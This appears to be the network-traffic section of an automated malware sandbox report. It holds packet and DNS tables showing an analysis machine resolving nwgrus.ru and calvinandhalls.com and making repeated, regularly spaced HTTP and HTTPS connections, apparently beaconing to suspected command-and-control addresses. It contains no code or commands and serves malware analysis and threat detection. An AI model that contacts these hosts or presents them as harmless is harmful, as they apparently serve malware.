                                                                                          Oct 3, 2024 23:28:40.956104994 CEST50017443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:40.974580050 CEST4435001723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:40.974601030 CEST4435001723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:40.974667072 CEST50017443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:40.974673986 CEST4435001723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:40.974915028 CEST4435001723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:40.974932909 CEST4435001723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:40.974970102 CEST50017443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:40.974977016 CEST4435001723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:40.975004911 CEST50017443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:40.981765985 CEST4435001723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:40.981827021 CEST50017443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:40.981833935 CEST4435001723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:40.981916904 CEST4435001723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:40.981925964 CEST50017443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:40.981944084 CEST50017443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:40.981961012 CEST4435001723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:40.981967926 CEST50017443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:40.981975079 CEST4435001723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:40.981987000 CEST4435001723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:41.068651915 CEST50018443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:41.068685055 CEST4435001823.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:41.068741083 CEST50018443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:41.070238113 CEST50018443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:41.070254087 CEST4435001823.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:41.697226048 CEST4435001823.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:41.697299004 CEST50018443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:41.705281019 CEST50018443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:41.705292940 CEST4435001823.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:41.705538034 CEST4435001823.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:41.706301928 CEST50018443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:41.706322908 CEST50018443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:41.706331015 CEST4435001823.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:41.984785080 CEST4435001823.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:41.984976053 CEST4435001823.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:41.985030890 CEST50018443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:41.985091925 CEST50018443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:41.985110998 CEST4435001823.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:41.985122919 CEST50018443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:41.985130072 CEST4435001823.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:42.055671930 CEST50019443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:42.055761099 CEST4435001923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:42.056013107 CEST50019443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:42.059674025 CEST50019443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:42.059715033 CEST4435001923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:42.666017056 CEST4435001923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:42.666243076 CEST50019443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:42.667475939 CEST50019443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:42.667531013 CEST4435001923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:42.667875051 CEST4435001923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:42.668708086 CEST50019443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:42.668708086 CEST50019443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:42.668807983 CEST4435001923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:42.951888084 CEST4435001923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:42.952047110 CEST4435001923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:42.952228069 CEST50019443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:42.952228069 CEST50019443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:42.952228069 CEST50019443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:42.952313900 CEST4435001923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:42.960057974 CEST50020443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:42.960102081 CEST4435002023.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:42.960484028 CEST50020443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:42.960778952 CEST50020443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:42.960823059 CEST4435002023.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:43.305308104 CEST50019443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:43.305373907 CEST4435001923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:43.574058056 CEST4435002023.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:43.574227095 CEST50020443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:43.575598001 CEST50020443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:43.575624943 CEST4435002023.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:43.576397896 CEST4435002023.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:43.577549934 CEST50020443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:43.577578068 CEST50020443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:43.577589989 CEST4435002023.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:43.941268921 CEST4435002023.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:43.941411018 CEST4435002023.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:43.941420078 CEST50020443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:43.941447020 CEST50020443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:43.941468954 CEST4435002023.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:43.941477060 CEST50020443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:43.941483974 CEST4435002023.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:43.941498041 CEST4435002023.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:49.276376963 CEST50021443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:49.276438951 CEST4435002123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:49.276503086 CEST50021443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:49.277700901 CEST50021443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:49.277719021 CEST4435002123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:49.904573917 CEST4435002123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:49.904679060 CEST50021443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:49.912859917 CEST50021443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:49.912875891 CEST4435002123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:49.913093090 CEST4435002123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:49.975115061 CEST50021443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:49.975152016 CEST50021443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:49.975166082 CEST4435002123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:50.255610943 CEST4435002123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:50.255867004 CEST4435002123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:50.255928993 CEST50021443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:50.298940897 CEST50021443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:50.298940897 CEST50021443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:28:50.298990011 CEST4435002123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:28:50.299007893 CEST4435002123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:29:16.012449026 CEST5002280192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:16.017987967 CEST8050022190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:16.018183947 CEST5002280192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:16.018275023 CEST5002280192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:16.018275023 CEST5002280192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:16.023675919 CEST8050022190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:16.023718119 CEST8050022190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:17.365068913 CEST8050022190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:17.365807056 CEST8050022190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:17.365926981 CEST5002280192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:17.366017103 CEST5002280192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:17.370951891 CEST8050022190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:22.473840952 CEST5002380192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:22.479233980 CEST8050023190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:22.479305029 CEST5002380192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:22.479424953 CEST5002380192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:22.479453087 CEST5002380192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:22.484585047 CEST8050023190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:22.484770060 CEST8050023190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:23.861526012 CEST8050023190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:23.862622023 CEST8050023190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:23.862679005 CEST5002380192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:23.862728119 CEST5002380192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:23.868073940 CEST8050023190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:30.832185984 CEST5002480192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:30.838176012 CEST8050024190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:30.838270903 CEST5002480192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:30.838433027 CEST5002480192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:30.838433027 CEST5002480192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:30.843635082 CEST8050024190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:30.843667984 CEST8050024190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:32.215879917 CEST8050024190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:32.216645956 CEST8050024190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:32.216730118 CEST5002480192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:32.216814041 CEST5002480192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:32.222326994 CEST8050024190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:42.047560930 CEST5002580192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:42.052870989 CEST8050025190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:42.052973986 CEST5002580192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:42.053097963 CEST5002580192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:42.053114891 CEST5002580192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:42.057972908 CEST8050025190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:42.058206081 CEST8050025190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:43.489607096 CEST8050025190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:43.489631891 CEST8050025190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:43.489723921 CEST5002580192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:43.489888906 CEST5002580192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:43.494790077 CEST8050025190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:53.002244949 CEST5002680192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:53.007515907 CEST8050026190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:53.007617950 CEST5002680192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:53.007772923 CEST5002680192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:53.007807970 CEST5002680192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:53.012799025 CEST8050026190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:53.012840986 CEST8050026190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:54.424612045 CEST8050026190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:54.425292969 CEST8050026190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:29:54.425367117 CEST5002680192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:54.425440073 CEST5002680192.168.2.5190.224.203.37
                                                                                          Oct 3, 2024 23:29:54.430339098 CEST8050026190.224.203.37192.168.2.5
                                                                                          Oct 3, 2024 23:30:04.659269094 CEST50027443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:04.659317017 CEST4435002723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:04.659373999 CEST50027443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:04.659753084 CEST50027443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:04.659766912 CEST4435002723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:05.289905071 CEST4435002723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:05.289990902 CEST50027443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:05.291116953 CEST50027443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:05.291126966 CEST4435002723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:05.291480064 CEST4435002723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:05.329252958 CEST50027443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:05.329272032 CEST50027443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:05.329338074 CEST4435002723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:05.676987886 CEST4435002723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:05.677073002 CEST4435002723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:05.677365065 CEST50027443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:05.677426100 CEST50027443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:05.677445889 CEST4435002723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:05.677453995 CEST50027443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:05.677459955 CEST4435002723.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:10.960849047 CEST5002880192.168.2.5187.131.253.169
                                                                                          Oct 3, 2024 23:30:10.965958118 CEST8050028187.131.253.169192.168.2.5
                                                                                          Oct 3, 2024 23:30:10.966037989 CEST5002880192.168.2.5187.131.253.169
                                                                                          Oct 3, 2024 23:30:10.966243029 CEST5002880192.168.2.5187.131.253.169
                                                                                          Oct 3, 2024 23:30:10.966279984 CEST5002880192.168.2.5187.131.253.169
                                                                                          Oct 3, 2024 23:30:10.971081018 CEST8050028187.131.253.169192.168.2.5
                                                                                          Oct 3, 2024 23:30:10.971223116 CEST8050028187.131.253.169192.168.2.5
                                                                                          Oct 3, 2024 23:30:12.046080112 CEST8050028187.131.253.169192.168.2.5
                                                                                          Oct 3, 2024 23:30:12.051363945 CEST8050028187.131.253.169192.168.2.5
                                                                                          Oct 3, 2024 23:30:12.051513910 CEST5002880192.168.2.5187.131.253.169
                                                                                          Oct 3, 2024 23:30:12.054625034 CEST5002880192.168.2.5187.131.253.169
                                                                                          Oct 3, 2024 23:30:12.059895992 CEST8050028187.131.253.169192.168.2.5
                                                                                          Oct 3, 2024 23:30:24.359764099 CEST50029443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:24.359802961 CEST4435002923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:24.359873056 CEST50029443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:24.360220909 CEST50029443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:24.360234022 CEST4435002923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:24.974380016 CEST4435002923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:24.974486113 CEST50029443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:24.975661993 CEST50029443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:24.975675106 CEST4435002923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:24.976442099 CEST4435002923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:24.977335930 CEST50029443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:24.977385044 CEST50029443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:24.977416992 CEST4435002923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:25.258035898 CEST4435002923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:25.258205891 CEST4435002923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:25.258444071 CEST50029443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:25.273740053 CEST50029443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:25.273789883 CEST4435002923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:25.273823023 CEST50029443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:25.273844004 CEST4435002923.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:31.539199114 CEST5003080192.168.2.5187.131.253.169
                                                                                          Oct 3, 2024 23:30:31.896914005 CEST8050030187.131.253.169192.168.2.5
                                                                                          Oct 3, 2024 23:30:31.897072077 CEST5003080192.168.2.5187.131.253.169
                                                                                          Oct 3, 2024 23:30:31.897259951 CEST5003080192.168.2.5187.131.253.169
                                                                                          Oct 3, 2024 23:30:31.897284031 CEST5003080192.168.2.5187.131.253.169
                                                                                          Oct 3, 2024 23:30:31.902146101 CEST8050030187.131.253.169192.168.2.5
                                                                                          Oct 3, 2024 23:30:31.902368069 CEST8050030187.131.253.169192.168.2.5
                                                                                          Oct 3, 2024 23:30:33.007349014 CEST8050030187.131.253.169192.168.2.5
                                                                                          Oct 3, 2024 23:30:33.007472992 CEST8050030187.131.253.169192.168.2.5
                                                                                          Oct 3, 2024 23:30:33.007546902 CEST5003080192.168.2.5187.131.253.169
                                                                                          Oct 3, 2024 23:30:33.007592916 CEST5003080192.168.2.5187.131.253.169
                                                                                          Oct 3, 2024 23:30:33.012402058 CEST8050030187.131.253.169192.168.2.5
                                                                                          Oct 3, 2024 23:30:36.177293062 CEST50031443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:36.177372932 CEST4435003123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:36.177447081 CEST50031443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:36.177716017 CEST50031443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:36.177750111 CEST4435003123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:36.788017988 CEST4435003123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:36.788145065 CEST50031443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:36.789207935 CEST50031443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:36.789242983 CEST4435003123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:36.789459944 CEST4435003123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:36.790157080 CEST50031443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:36.790196896 CEST50031443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:36.790231943 CEST4435003123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:37.074385881 CEST4435003123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:37.074487925 CEST4435003123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:37.074562073 CEST50031443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:37.074645042 CEST50031443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:37.074645042 CEST50031443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:37.074692011 CEST4435003123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:37.074721098 CEST4435003123.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:44.682951927 CEST5003280192.168.2.5187.131.253.169
                                                                                          Oct 3, 2024 23:30:44.688327074 CEST8050032187.131.253.169192.168.2.5
                                                                                          Oct 3, 2024 23:30:44.688429117 CEST5003280192.168.2.5187.131.253.169
                                                                                          Oct 3, 2024 23:30:44.688546896 CEST5003280192.168.2.5187.131.253.169
                                                                                          Oct 3, 2024 23:30:44.688580990 CEST5003280192.168.2.5187.131.253.169
                                                                                          Oct 3, 2024 23:30:44.693650007 CEST8050032187.131.253.169192.168.2.5
                                                                                          Oct 3, 2024 23:30:44.693680048 CEST8050032187.131.253.169192.168.2.5
                                                                                          Oct 3, 2024 23:30:45.768537998 CEST8050032187.131.253.169192.168.2.5
                                                                                          Oct 3, 2024 23:30:45.768587112 CEST8050032187.131.253.169192.168.2.5
                                                                                          Oct 3, 2024 23:30:45.768673897 CEST5003280192.168.2.5187.131.253.169
                                                                                          Oct 3, 2024 23:30:45.768790960 CEST5003280192.168.2.5187.131.253.169
                                                                                          Oct 3, 2024 23:30:45.773694992 CEST8050032187.131.253.169192.168.2.5
                                                                                          Oct 3, 2024 23:30:55.321252108 CEST50033443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:55.321307898 CEST4435003323.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:55.321379900 CEST50033443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:55.321660042 CEST50033443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:55.321681023 CEST4435003323.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:55.980276108 CEST4435003323.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:55.980520010 CEST50033443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:55.981451035 CEST50033443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:55.981483936 CEST4435003323.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:55.982264042 CEST4435003323.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:55.982970953 CEST50033443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:55.983016014 CEST50033443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:55.983146906 CEST4435003323.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:56.286880016 CEST4435003323.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:56.287026882 CEST4435003323.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:56.287113905 CEST50033443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:56.287288904 CEST50033443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:56.287288904 CEST50033443192.168.2.523.145.40.162
                                                                                          Oct 3, 2024 23:30:56.287339926 CEST4435003323.145.40.162192.168.2.5
                                                                                          Oct 3, 2024 23:30:56.287368059 CEST4435003323.145.40.162192.168.2.5
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Oct 3, 2024 23:27:22.646028996 CEST5923853192.168.2.51.1.1.1
                                                                                          Oct 3, 2024 23:27:23.722333908 CEST5923853192.168.2.51.1.1.1
                                                                                          Oct 3, 2024 23:27:24.727400064 CEST5923853192.168.2.51.1.1.1
                                                                                          Oct 3, 2024 23:27:24.944288015 CEST53592381.1.1.1192.168.2.5
                                                                                          Oct 3, 2024 23:27:24.944324017 CEST53592381.1.1.1192.168.2.5
                                                                                          Oct 3, 2024 23:27:24.944351912 CEST53592381.1.1.1192.168.2.5
                                                                                          Oct 3, 2024 23:28:26.404886961 CEST6109653192.168.2.51.1.1.1
                                                                                          Oct 3, 2024 23:28:26.650834084 CEST53610961.1.1.1192.168.2.5
                                                                                          Oct 3, 2024 23:30:08.620316029 CEST5184453192.168.2.51.1.1.1
                                                                                          Oct 3, 2024 23:30:09.617832899 CEST5184453192.168.2.51.1.1.1
                                                                                          Oct 3, 2024 23:30:10.633510113 CEST5184453192.168.2.51.1.1.1
                                                                                          Oct 3, 2024 23:30:10.960089922 CEST53518441.1.1.1192.168.2.5
                                                                                          Oct 3, 2024 23:30:10.960134029 CEST53518441.1.1.1192.168.2.5
                                                                                          Oct 3, 2024 23:30:10.960165977 CEST53518441.1.1.1192.168.2.5
                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Oct 3, 2024 23:27:22.646028996 CEST192.168.2.51.1.1.10x5921Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:23.722333908 CEST192.168.2.51.1.1.10x5921Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.727400064 CEST192.168.2.51.1.1.10x5921Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:28:26.404886961 CEST192.168.2.51.1.1.10xcd36Standard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:08.620316029 CEST192.168.2.51.1.1.10x217eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:09.617832899 CEST192.168.2.51.1.1.10x217eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:30:10.633510113 CEST192.168.2.51.1.1.10x217eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Oct 3, 2024 23:27:16.410582066 CEST1.1.1.1192.168.2.50x234cNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:16.410582066 CEST1.1.1.1192.168.2.50x234cNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:16.519319057 CEST1.1.1.1192.168.2.50x77aaNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:16.519319057 CEST1.1.1.1192.168.2.50x77aaNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:17.066559076 CEST1.1.1.1192.168.2.50xcc81No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:17.066559076 CEST1.1.1.1192.168.2.50xcc81No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                          Oct 3, 2024 23:27:24.944288015 CEST1.1.1.1192.168.2.50x5921No error (0)nwgrus.ru190.224.203.37A (IP address)IN (0x0001)false
